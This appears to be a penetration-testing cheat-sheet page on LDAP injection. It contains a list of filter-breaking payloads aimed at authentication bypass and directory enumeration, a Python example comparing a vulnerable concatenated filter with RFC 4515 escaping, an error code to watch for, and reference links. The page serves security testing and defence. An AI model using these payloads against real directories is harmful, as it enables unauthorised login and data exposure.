# LDAP Injection

LDAP Injection is a type of security vulnerability that can occur in web applications that use Lightweight Directory Access Protocol (LDAP) for authentication and/or authorization. It is a form of injection attack similar to SQL injection, but instead of targeting a database, it targets an LDAP server.

### Payloads

```
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
```
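How several of the payloads above change a filter built by string concatenation, and how RFC 4515 value escaping keeps the filter's structure intact. This is an added example, not code from the original page; the filter template, the `objectClass` and `uid` attributes, and all function names are assumptions.

```python
# Added example: RFC 4515 assertion-value escaping for LDAP search filters.
# The filter template and attribute names (objectClass, uid) are assumptions.

# RFC 4515 section 3: these characters must appear as \XX inside a value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape untrusted input before placing it in a search filter."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(username: str) -> str:
    # Vulnerable pattern: input is concatenated into the filter unchanged.
    return f"(&(objectClass=person)(uid={username}))"


def build_filter_safe(username: str) -> str:
    # Hardened pattern: metacharacters become inert \XX sequences.
    return f"(&(objectClass=person)(uid={escape_filter_value(username)}))"


def shape(filter_str: str) -> str:
    """Keep only the characters that open, close or wildcard a filter term."""
    return "".join(ch for ch in filter_str if ch in "()*")


# Shape of the filter the developer intended: one AND of two simple matches.
INTENDED_SHAPE = shape(build_filter_safe("alice"))

# Inputs taken from the payload list above.
SAMPLES = ["*", "admin*", "*)(uid=*))(|(uid=*"]

if __name__ == "__main__":
    for s in SAMPLES:
        unsafe, safe = build_filter_unsafe(s), build_filter_safe(s)
        print(f"input : {s}")
        print(f"unsafe: {unsafe}  shape changed: {shape(unsafe) != INTENDED_SHAPE}")
        print(f"safe  : {safe}  shape changed: {shape(safe) != INTENDED_SHAPE}")
```

In application code, prefer the LDAP library's own escaper, for example `escape_filter_chars` in `ldap3.utils.conv` or in python-ldap's `ldap.filter`. Values placed in a distinguished name need the separate RFC 4514 escaping rules.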

### Errors

When testing for LDAP Injection, sometimes only an error will be output in the response. For example, the error code `0x80005000`:

{% embed url="<https://learn.microsoft.com/en-us/answers/questions/566916/exception-unknown-error-(0x80005000)-while-creatin>" %}

### References

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection>" %}

{% embed url="<https://book.hacktricks.xyz/pentesting-web/ldap-injection>" %}

{% embed url="<https://portswigger.net/kb/issues/00100500_ldap-injection>" %}
